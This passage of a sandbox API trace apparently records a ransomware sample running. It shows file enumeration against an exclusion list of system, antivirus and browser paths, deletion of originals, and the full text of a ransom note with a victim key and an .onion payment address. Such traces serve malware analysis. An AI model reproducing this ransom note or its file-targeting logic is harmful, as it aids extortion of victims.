lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.541] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.541] CloseHandle (hObject=0x5a0) returned 1 [0143.541] CloseHandle (hObject=0x588) returned 1 [0143.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 0x20 [0143.541] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", dwFileAttributes=0x20) returned 1 [0143.542] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 1 [0143.542] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0143.542] CryptDestroyKey (hKey=0x8bdd38) returned 1 [0143.542] wcslen (_String="OK") returned 0x2 [0143.542] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.543] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.543] CryptDestroyKey (hKey=0x8bdc78) returned 1 [0143.543] CryptDestroyHash (hHash=0x8bdbf8) returned 1 [0143.543] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0143.543] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.543] PathMatchSpecW (pszFile="StreamServer.dll", pszSpec="*NMCRYPT") returned 0 [0143.543] PathMatchSpecW (pszFile="StreamServer.dll", pszSpec="*Recovers your files.html") returned 0 [0143.543] PathMatchSpecW (pszFile="StreamServer.dll", pszSpec="*.exe") returned 0 [0143.543] PathMatchSpecW (pszFile="StreamServer.dll", pszSpec="*.dll") returned 1 [0143.543] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.543] PathMatchSpecW (pszFile="ucrtbase.dll", pszSpec="*NMCRYPT") returned 0 [0143.543] PathMatchSpecW (pszFile="ucrtbase.dll", pszSpec="*Recovers your files.html") returned 0 [0143.543] PathMatchSpecW (pszFile="ucrtbase.dll", pszSpec="*.exe") returned 0 [0143.543] PathMatchSpecW (pszFile="ucrtbase.dll", pszSpec="*.dll") returned 1 [0143.543] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.543] PathMatchSpecW (pszFile="vccorlib140.dll", pszSpec="*NMCRYPT") returned 0 [0143.543] PathMatchSpecW (pszFile="vccorlib140.dll", pszSpec="*Recovers your files.html") returned 0 [0143.543] PathMatchSpecW (pszFile="vccorlib140.dll", pszSpec="*.exe") returned 0 [0143.543] PathMatchSpecW (pszFile="vccorlib140.dll", pszSpec="*.dll") returned 1 [0143.543] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.543] PathMatchSpecW (pszFile="vcruntime140.dll", pszSpec="*NMCRYPT") returned 0 [0143.543] PathMatchSpecW (pszFile="vcruntime140.dll", pszSpec="*Recovers your files.html") returned 0 [0143.543] PathMatchSpecW (pszFile="vcruntime140.dll", pszSpec="*.exe") returned 0 [0143.543] PathMatchSpecW (pszFile="vcruntime140.dll", pszSpec="*.dll") returned 1 [0143.543] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0143.543] GetLastError () returned 0x12 [0143.543] FindClose (in: hFindFile=0x8be838 | out: hFindFile=0x8be838) returned 1 [0143.543] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0143.543] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0143.544] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0143.544] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.544] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.544] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.544] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.544] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.544] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.544] wcslen (_String="\\\\?\\") returned 0x4 [0143.544] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.exe") returned 0 [0143.544] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.dll") returned 0 [0143.544] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.lnk") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.bat") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.ini") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.msi") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*.scf") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*pagefile.sys*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*AppData*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\winrar\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\java\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\windows\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\ESET\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\AVG\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*Atheros*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*Realtek*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*bootmgr*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*boot*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*boot*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*IO.SYS*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*ntldr*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*chrome*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*opera*") returned 0 [0143.545] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", pszSpec="*firefox*") returned 0 [0143.545] wcslen (_String="\\\\?\\") returned 0x4 [0143.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x8be838 [0143.546] wcscmp (_String1=".", _String2=".") returned 0 [0143.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.546] wcscmp (_String1="..", _String2=".") returned 1 [0143.546] wcscmp (_String1="..", _String2="..") returned 0 [0143.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*NMCRYPT") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*Recovers your files.html") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.exe") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.dll") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.lnk") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.bat") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.ini") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.msi") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*.scf") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*pagefile.sys*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*NTUSER.DAT*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*AppData*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\winrar\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\java\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\windows\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\ESET\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\AVG\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\AVIRA\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*Atheros*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*Realtek*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*bootmgr*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*boot*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*boot*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*CONFIG.SYS*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*IO.SYS*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*MSDOS.SYS*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*NTDETECT.COM*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*ntldr*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*chrome*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*opera*") returned 0 [0143.546] PathMatchSpecW (pszFile="Alphabet.xml", pszSpec="*firefox*") returned 0 [0143.547] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml", pszSpec="*") returned 1 [0143.547] strlen (_Str="NMoreira") returned 0x8 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 